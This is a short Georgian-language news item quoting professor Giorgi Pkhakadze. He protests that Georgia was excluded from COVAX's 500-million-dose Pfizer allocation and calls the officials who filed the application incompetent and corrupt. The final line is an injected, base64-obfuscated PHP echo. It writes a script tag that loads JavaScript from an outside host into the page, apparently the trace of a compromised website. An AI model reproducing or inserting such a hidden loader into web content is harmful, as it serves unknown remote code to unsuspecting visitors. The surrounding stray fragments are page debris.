celsiusi
ავერსი საქკაბელი
პროფესორი, ორგანიზაციის – „აკრედიტაცია საზღვრების გარეშე“ – ხელმძვანელი, გიორგი ფხაკაძე ამბობს, რომ COVAX-ის 500 მილიონიან პროგრამაში საქართველო ვერ მოხვდა.
 
მისივე თქმით, უკრაინა და მოლდოვა არიან იმ 92 ქვეყნის სიაში, რომელიც აღნიშნული 500 მილიონი დოზიდან ვაქცინას მიიღებს, მაგრამ საქართველო არა. 
 
“რა დავაშავეთ მართლა? გახსოვთ რომ ვთქვი რომ საქართველო არ არის იმ 92 ქვეყნის სიაში ?! და აი შედეგი.. ახლა ვინც COVAX-ის აპლიკაცია შეავსო, ხომ არის ამ პირის/პირების პასუხისმგებლობის  საკითხი დასაყენებრლი?! 500 მილიონი დოზა “ფაიზერის”  ვაქცინის არის გათვლილი (AMS) ქვეყნებისთვის ანუ ღარიბი ქვეყნებისთვის,  იმათთვის ვინც თქვა რომ არ არ შეგვიძლია, თქვენ გარდა სხვა გამოსაალი არა გვაქვს და დაგვეხმარეთ ვაქცინით, და მეორე ქვეყნები რომლებიც არიან თვითდაფინანსებაზე . ეს იმას ნიშნავას “ჩვენ ისედაც ვიშოვით, მაგრამ ნუ ყოველი შემთხვევისთვის თქვენგანაც ვიყიდით” . ერთი ჩამახედა იმათ ტვინში ვინც შეავსო საქართველოში ეს აპლიკაცია. რამდენი შეცდომა შეიძლება? ეს მავნებლები, კიდევ გამოდიან და ჭკუას გვარიგებენ ეს კორუმპირებულები და უზრდელები . ისეთი მაგრები არიან რომ აპლიკაციაში ჩაწერეს - “ჩვენ ისეთი მაგრები ვართ ისედაც ვიყიდით ვაქცინას , ნუ კოვაქსიდანაც რაღაცას ავიღებთო.” ახლა კოვაქსის გარდა არაფერი სხვა ვარიანტი არ აქვთ და ჩინური გაურკვეველი ეტიოლოგიის რაღაც ჩამოიტანეს . ამიხსენით სანამდე ეს არაფროფესიონალიზმი სანამდე!?“ - განაცხადა ფხაკაძემ.
 
 
 
7646
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");